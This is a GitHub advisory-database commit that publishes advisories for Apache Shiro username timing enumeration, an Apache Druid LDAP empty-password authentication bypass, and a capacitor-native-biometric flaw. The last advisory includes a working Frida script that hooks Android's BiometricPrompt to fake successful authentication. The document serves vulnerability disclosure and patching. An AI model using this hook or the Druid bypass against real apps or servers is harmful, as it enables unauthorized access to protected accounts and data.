Publish Advisories

GHSA-c4qc-4q9p-m9q9
GHSA-q672-hfc7-g833
GHSA-vx5f-vmr6-32wf
GHSA-x6cr-mq53-cc76

Author: advisory-database[bot]

…-c4qc-4q9p-m9q9/GHSA-c4qc-4q9p-m9q9.json …-c4qc-4q9p-m9q9/GHSA-c4qc-4q9p-m9q9.jsonadvisories/unreviewed/2026/02/GHSA-c4qc-4q9p-m9q9/GHSA-c4qc-4q9p-m9q9.json renamed to advisories/github-reviewed/2026/02/GHSA-c4qc-4q9p-m9q9/GHSA-c4qc-4q9p-m9q9.json advisories/unreviewed/2026/02/GHSA-c4qc-4q9p-m9q9/GHSA-c4qc-4q9p-m9q9.json renamed to advisories/github-reviewed/2026/02/GHSA-c4qc-4q9p-m9q9/GHSA-c4qc-4q9p-m9q9.json

@@ -1,24 +1,49 @@
 {
   "schema_version": "1.4.0",
   "id": "GHSA-c4qc-4q9p-m9q9",
-  "modified": "2026-02-10T12:30:28Z",
+  "modified": "2026-02-10T14:33:33Z",
   "published": "2026-02-10T12:30:28Z",
   "aliases": [
     "CVE-2026-23901"
   ],
+  "summary": "Apache Shiro Affected by an Observable Timing Discrepancy Vulnerability",
   "details": "Observable Timing Discrepancy vulnerability in Apache Shiro.\n\nThis issue affects Apache Shiro: from 1.*, 2.* before 2.0.7.\n\nUsers are recommended to upgrade to version 2.0.7 or later, which fixes the issue.\n\nPrior to Shiro 2.0.7, code paths for non-existent vs. existing users are different enough,\nthat a brute-force attack may be able to tell, by timing the requests only, determine if\nthe request failed because of a non-existent user vs. wrong password.\n\nThe most likely attack vector is a local attack only.\nShiro security model  https://shiro.apache.org/security-model.html#username_enumeration  discusses this as well.\n\nTypically, brute force attack can be mitigated at the infrastructure level.",
   "severity": [
     {
       "type": "CVSS_V4",
-      "score": "CVSS:4.0/AV:L/AC:H/AT:P/PR:L/UI:A/VC:L/VI:N/VA:N/SC:L/SI:N/SA:N/E:X/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:N/AU:Y/R:A/V:C/RE:L/U:Green"
+      "score": "CVSS:4.0/AV:L/AC:H/AT:P/PR:L/UI:A/VC:L/VI:N/VA:N/SC:L/SI:N/SA:N"
+    }
+  ],
+  "affected": [
+    {
+      "package": {
+        "ecosystem": "Maven",
+        "name": "org.apache.shiro:shiro-core"
+      },
+      "ranges": [
+        {
+          "type": "ECOSYSTEM",
+          "events": [
+            {
+              "introduced": "0"
+            },
+            {
+              "fixed": "2.1.0"
+            }
+          ]
+        }
+      ]
     }
   ],
-  "affected": [],
   "references": [
     {
       "type": "ADVISORY",
       "url": "https://nvd.nist.gov/vuln/detail/CVE-2026-23901"
     },
+    {
+      "type": "PACKAGE",
+      "url": "https://github.com/apache/shiro"
+    },
     {
       "type": "WEB",
       "url": "https://lists.apache.org/thread/mm1jct9b86jvnh3y44tj22xvjtx3xhhh"
@@ -33,8 +58,8 @@
       "CWE-208"
     ],
     "severity": "LOW",
-    "github_reviewed": false,
-    "github_reviewed_at": null,
+    "github_reviewed": true,
+    "github_reviewed_at": "2026-02-10T14:33:33Z",
     "nvd_published_at": "2026-02-10T10:15:59Z"
   }
 }

…-q672-hfc7-g833/GHSA-q672-hfc7-g833.json …-q672-hfc7-g833/GHSA-q672-hfc7-g833.jsonadvisories/unreviewed/2026/02/GHSA-q672-hfc7-g833/GHSA-q672-hfc7-g833.json renamed to advisories/github-reviewed/2026/02/GHSA-q672-hfc7-g833/GHSA-q672-hfc7-g833.json advisories/unreviewed/2026/02/GHSA-q672-hfc7-g833/GHSA-q672-hfc7-g833.json renamed to advisories/github-reviewed/2026/02/GHSA-q672-hfc7-g833/GHSA-q672-hfc7-g833.json

@@ -1,19 +1,49 @@
 {
   "schema_version": "1.4.0",
   "id": "GHSA-q672-hfc7-g833",
-  "modified": "2026-02-10T12:30:28Z",
+  "modified": "2026-02-10T14:33:40Z",
   "published": "2026-02-10T12:30:28Z",
   "aliases": [
     "CVE-2026-23906"
   ],
+  "summary": "Apache Druid Vulnerable to Authentication Bypass",
   "details": "Affected Products and Versions\n  *  Apache Druid\n  *  Affected Versions: 0.17.0 through 35.x (all versions prior to 36.0.0)\n  *  Prerequisites:  *  druid-basic-security extension enabled\n  *  LDAP authenticator configured\n  *  Underlying LDAP server permits anonymous bind                                                                                                                                                   \n\n\n\n\n\n\nVulnerability Description\n\nAn authentication bypass vulnerability exists in Apache Druid when using the druid-basic-security extension with LDAP authentication. If the underlying LDAP server is configured to allow anonymous\nbinds, an attacker can bypass authentication by providing an existing username with an empty password. This allows unauthorized access to otherwise restricted Druid resources without valid credentials.\n\nThe vulnerability stems from improper validation of LDAP authentication responses when anonymous binds are permitted, effectively treating anonymous bind success as valid user authentication. \n\nImpact\n\nA remote, unauthenticated attacker can:\n  *  Gain unauthorized access to the Apache Druid cluster\n  *  Access sensitive data stored in Druid datasources\n  *  Execute queries and potentially manipulate data\n  *  Access administrative interfaces if the bypassed account has elevated privileges\n  *  Completely compromise the confidentiality, integrity, and availability of the Druid deployment                                                                                                                                                                                    \n\n\nMitigation\n \nImmediate Mitigation (No Druid Upgrade Required):                                                                                                                                                    \n  *  Disable anonymous bind on your LDAP server. This prevents the vulnerability from being exploitable and is the recommended immediate action.\n\n\n\nResolution\n  *  Upgrade Apache Druid to version 36.0.0 or later, which includes fixes to properly reject anonymous LDAP bind attempts.",
-  "severity": [],
-  "affected": [],
+  "severity": [
+    {
+      "type": "CVSS_V4",
+      "score": "CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:N/VC:H/VI:H/VA:H/SC:N/SI:N/SA:N"
+    }
+  ],
+  "affected": [
+    {
+      "package": {
+        "ecosystem": "Maven",
+        "name": "org.apache.druid.extensions:druid-basic-security"
+      },
+      "ranges": [
+        {
+          "type": "ECOSYSTEM",
+          "events": [
+            {
+              "introduced": "0.17.0"
+            },
+            {
+              "fixed": "36.0.0"
+            }
+          ]
+        }
+      ]
+    }
+  ],
   "references": [
     {
       "type": "ADVISORY",
       "url": "https://nvd.nist.gov/vuln/detail/CVE-2026-23906"
     },
+    {
+      "type": "WEB",
+      "url": "https://github.com/apache/druid"
+    },
     {
       "type": "WEB",
       "url": "https://lists.apache.org/thread/2x9rv3kv6t1p577lvq4z0rl0zlt9g4sr"
@@ -23,9 +53,9 @@
     "cwe_ids": [
       "CWE-287"
     ],
-    "severity": null,
-    "github_reviewed": false,
-    "github_reviewed_at": null,
+    "severity": "CRITICAL",
+    "github_reviewed": true,
+    "github_reviewed_at": "2026-02-10T14:33:40Z",
     "nvd_published_at": "2026-02-10T10:15:59Z"
   }
 }

advisories/github-reviewed/2026/02/GHSA-vx5f-vmr6-32wf/GHSA-vx5f-vmr6-32wf.json

@@ -0,0 +1,59 @@
+{
+  "schema_version": "1.4.0",
+  "id": "GHSA-vx5f-vmr6-32wf",
+  "modified": "2026-02-10T14:33:50Z",
+  "published": "2026-02-10T14:33:50Z",
+  "aliases": [],
+  "summary": "cap-go/capacitor-native-biometric Authentication Bypass",
+  "details": "There is a potential issue with the [cap-go/capacitor-native-biometric](https://github.com/Cap-go/capacitor-native-biometric) library. \n\n---\n\n## Summary\n\nThe [cap-go/capacitor-native-biometric](https://github.com/Cap-go/capacitor-native-biometric) library was found to be subject to an authentication bypass as the current implementation of the `onAuthenticationSucceeded()` does not appear to handle a `CryptoObject`[^HackTricks1] [^SecuringBiometricAuthentication] as seen in the following code block starting from [line 88 in AuthActivity.java](https://github.com/Cap-go/capacitor-native-biometric/blob/main/android/src/main/java/ee/forgr/biometric/AuthActivity.java#L88):\n\n```java\n@Override\n    public void onAuthenticationSucceeded(\n        @NonNull BiometricPrompt.AuthenticationResult result\n    ) {\n        super.onAuthenticationSucceeded(result);\n        finishActivity(\"success\");\n    }\n```\n\nAs the current implementation only checks whether `onAuthenticationSucceeded()` was called and does not handle a `CryptoObject` the biometric authentication can be bypassed by hooking the `onAuthenticationSucceeded()` function. \n\n## PoC Video:\n\nhttps://github.com/user-attachments/assets/b7b5a2bc-21dc-4373-b371-84b002dae7a7\n\n## Environment:\n\nThe following steps were taken to create and deploy a Capacitor application using the `cap-go/capacitor-native-biometric library` for the purpose of verifying this finding. Note at the time of writing the `npx create-react-app` command broke, so I have provided two ways of creating and deploying the testing environment. Apparently React updated to version 19 caused a dependency issue as seen [here](https://github.com/facebook/create-react-app/issues/13715). If it is not fixed by the time you look at this PoC please use the yarn alternatives. \n\n1. Create a new Capacitor app by opening your terminal and run the following commands to create a new Capacitor app. For the sake of the disclosure I'll be using the name `capgo-poc`: \n\n```sh\nnpx create-react-app capgo-poc --template typescript\n```\n\nYarn Alternative:\n\n```sh\nnpm install --global yarn\nyarn create react-app capgo-poc --template typescript\n```\n\n2. Install dependencies by navigating into your app's directory and run the following command to install Capacitor's core dependencies:\n\n```sh\ncd capgo-poc\nnpm install @capacitor/core \nnpm install @capacitor/cli \nnpm install @capacitor/android\nnpm install @capgo/capacitor-native-biometric\nnpm install react\n```\n\nYarn Alternative:\n\n```sh\ncd capgo-poc\nyarn add @capacitor/core \nyarn add @capacitor/cli \nyarn add @capacitor/android\nyarn add @capgo/capacitor-native-biometric\nyarn add react\n```\n\n3. Initialise the project using the name `capgo-poc` and `com.capgo.poc`, and add the android platform by running the following commands:\n\n```sh\nnpx cap init\nnpx cap add android\n```\n\n4. Configure the android permissions by opening the `android/app/src/main/AndroidManifest.xml` file and add the necessary permissions:\n\n```xml\n<uses-permission android:name=\"android.permission.USE_BIOMETRIC\" />\n<uses-permission android:name=\"android.permission.USE_FINGERPRINT\" />\n```\n\n5. Implement Biometric Authentication, here is some basic code to use the biometric authentication feature. Modify the TSX file called `App.tsx` in `src/` and import the following code:\n\n```js\nimport React, { useState } from 'react';\nimport { NativeBiometric } from '@capgo/capacitor-native-biometric';\n\nconst App = () => {\n  // State to hold authentication status\n  const [authStatus, setAuthStatus] = useState<string | null>(null);\n\n  // Function to authenticate the user\n  const authenticateUser = async () => {\n    try {\n      const result = await NativeBiometric.verifyIdentity({\n        reason: 'For an application access',\n        title: 'Log in',\n        subtitle: '',\n        description: 'Verify yourself by biometrics',\n        useFallback: true,\n        maxAttempts: 3,\n      }).then(() => true)\n        .catch(() => false);\n\n      if (!result) {\n        setAuthStatus('failed');\n      } else {\n        setAuthStatus('success');\n      }\n    } catch (error) {\n      console.error('Error during biometric verification:', error);\n      setAuthStatus('error');\n    }\n  };\n\n  return (\n    <div>\n      <h1>CAP-GO Capacitor Native Biometric Authentication</h1>\n      <button onClick={authenticateUser}>Authenticate with Biometrics</button>\n\n      {/* Conditionally render based on authentication status */}\n      {authStatus === 'success' && <h2>CAP-GO Capacitor Native Biometric Authentication Success</h2>}\n      {authStatus === 'failed' && <h2>CAP-GO Capacitor Native Biometric Authentication Failed</h2>}\n      {authStatus === 'error' && <h2>Error during authentication</h2>}\n    </div>\n  );\n};\n\nexport default App;\n```\n\n6. Build the React project, synchronise it with the Android platform, and open the native Android project in Android Studio by running the following commands:\n\n```sh\nnpm run build\nnpx cap sync android \nnpx cap open android\n```\n\nYarn alternative:\n\n```sh\nyarn build\nnpx cap sync android \nnpx cap open android\n```\n\n## Exploitation:\n\nFor the purpose of demonstrating the vulnerability we will be using frida and a rooted emulator from android studio. Frida is a dynamic instrumentation toolkit used as part of pentesting mobile applications [^frida]. \n\nNote that a rooted emulator is not necessary, but is being used for simplicity to demonstrate the vulnerability. \n\n1. Copy the below frida script to a JavaScript file and run it to hook the `onAuthenticationSucceeded()` function, abusing the `null CryptoObject`. This can be done by running the following command:\n\n```sh\nfrida -U -l <PAYLOAD> -n 'capgo-poc'\n```\n\n### Payload\n```js\nJava.perform(function () {\n  hookBiometricPrompt();\n});\n\nfunction getBiometricAuthResult(resultObj, cryptoInst) {\n    var authenticationResultInst = resultObj.$new(cryptoInst, 0);\n    return authenticationResultInst;\n};\n\nfunction getBiometricPromptResult() {\n    var cryptoObj = Java.use('android.hardware.biometrics.BiometricPrompt$CryptoObject');\n    var cryptoInst = cryptoObj.$new(null);\n    var authenticationResultObj = Java.use('android.hardware.biometrics.BiometricPrompt$AuthenticationResult');\n    var authenticationResultInst = getBiometricAuthResult(authenticationResultObj, cryptoInst);\n    return authenticationResultInst\n};\n\nfunction hookBiometricPrompt() {\n    var biometricPrompt = Java.use('android.hardware.biometrics.BiometricPrompt')['authenticate'].overload('android.os.CancellationSignal', 'java.util.concurrent.Executor', 'android.hardware.biometrics.BiometricPrompt$AuthenticationCallback');\n    console.log(\"Hooking BiometricPrompt.authenticate()...\");\n    biometricPrompt.implementation = function (cancellationSignal, executor, callback) {\n        var authenticationResultInst = getBiometricPromptResult();\n        callback.onAuthenticationSucceeded(authenticationResultInst);\n    }\n};\n```\n\n[^SecuringBiometricAuthentication]: https://www.kayssel.com/post/android-8/\n[^HackTricks1]: https://book.hacktricks.xyz/mobile-pentesting/android-app-pentesting/bypass-biometric-authentication-android#method-1-bypassing-with-no-crypto-object-usage\n[^frida]: https://frida.re/",
+  "severity": [
+    {
+      "type": "CVSS_V4",
+      "score": "CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:N/VC:N/VI:L/VA:N/SC:N/SI:N/SA:N"
+    }
+  ],
+  "affected": [
+    {
+      "package": {
+        "ecosystem": "npm",
+        "name": "@capgo/capacitor-native-biometric"
+      },
+      "ranges": [
+        {
+          "type": "ECOSYSTEM",
+          "events": [
+            {
+              "introduced": "0"
+            },
+            {
+              "fixed": "8.3.6"
+            }
+          ]
+        }
+      ]
+    }
+  ],
+  "references": [
+    {
+      "type": "WEB",
+      "url": "https://github.com/Cap-go/capgo/security/advisories/GHSA-vx5f-vmr6-32wf"
+    },
+    {
+      "type": "WEB",
+      "url": "https://github.com/Cap-go/capacitor-native-biometric/commit/1254602e942f8216e6258f646f0866d8e69c48a5"
+    },
+    {
+      "type": "PACKAGE",
+      "url": "https://github.com/Cap-go/capgo"
+    }
+  ],
+  "database_specific": {
+    "cwe_ids": [
+      "CWE-287"
+    ],
+    "severity": "MODERATE",
+    "github_reviewed": true,
+    "github_reviewed_at": "2026-02-10T14:33:50Z",
+    "nvd_published_at": null
+  }
+}